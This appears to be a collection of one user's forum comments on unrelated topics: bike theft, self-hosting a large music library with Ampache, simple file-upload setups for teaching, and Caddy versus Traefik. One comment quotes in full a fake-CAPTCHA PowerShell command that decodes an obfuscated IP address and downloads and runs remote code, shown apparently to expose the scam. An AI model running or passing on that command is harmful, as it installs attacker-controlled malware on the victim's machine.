

It’s funny how even in countries where people leave their expensive belongings unattended without worrying still sees bikes as acceptable targets as if it’s like a global standard. I would also put umbrellas there too.
It’s funny how even in countries where people leave their expensive belongings unattended without worrying still sees bikes as acceptable targets as if it’s like a global standard. I would also put umbrellas there too.
For those who want to see it in action:
It gives you the following script:
powershell -NoExit -c “$znn=‘sggk://91.212.166.104/e/2e’;$djq=$znn.ToCharArray()|%{if($_ -cmatch ‘[a-z]’){[char](122 - ([int][char]$_ - 97))}else{$_}};$jgq=($djq -join ‘’);([ScriptBlock]::Create((Invoke-RestMethod $jgq))).Invoke();”
I can’t check what the CAPTCHA prompt says since I’m on mobile, but I’m guessing it asks you to paste it into your console.
The three letter agencies?
Suspiciously nut-shaped training dataset:
Same. There are some tracks and albums I don’t like, but I won’t delete them. Another reason to use smart playlist, I can just put them into “Not My Style” playlist and it’s magically gone from my main list.
Try Ampache! I host 75k files with it.
Item Count: 74939 | Duration: 5274:37:36
Well, I don’t actually play all of them in a straight line; it’s more of an archive. Still, my main playlist is few thousand songs long, which is created with smart playlists.
They’re available in Soulseek! Both Soulseek and Ampache share the same directory. I was thinking of creating a torrent, but I am still in the process of deduplicating them, so I decided against it.
Why do I see no mentions of Ampache here? From what I found, it was the only program except Navidrome to support nested smart playlist, and Ampache has the editor directly in the web interface.
Anyways, I host mine too! Over 2TB of music files on my server, and it runs pretty well.
found 7745962577 vulnerabilities (7653345675 low, 91726393 medium, 817263 high, 73246 critical)
Actually, that’s what I’ve done. It gets a bit tedious when the file size gets a bit big.
I honestly did not know Nextcloud allowed uploads without login. I definitely need to check that out.
It would be desirable, as I don’t have to be prepared whenever someone starts sending a file, but I suppose I can live without it. Thank you for the suggestion!
I’ll have to see if it works in my environment, but otherwise it looks cool! Thank you.
I am a teaching assistant, and occasionally people ask me why their code isn’t working. I take it to my device so they can continue their work whilst I figure out the issue. I want to minimise the uploading complexity, and the time it takes to upload one.
“Kids, if you really want to piss off your parents, buy real estate in an imaginary place.”
Its ok, everyone makes mistakes 🥰
In terms of setup, Caddy is a lot simpler in syntax, but you will find more tutorials for Traefik and it has better integration with Docker. You can add labels to a container and Traefik uses that as config, whereas in Caddy, you need to set up both the container and the config file. If you want to drop a service, then it is easier in Traefik for this reason. But with decent Nix code, you can basically replicate this in Caddy. Once you set them up, they’re pretty much the same. I’ve seen some people saying Traefik is faster, but realistically, I don’t think it’s meaningful.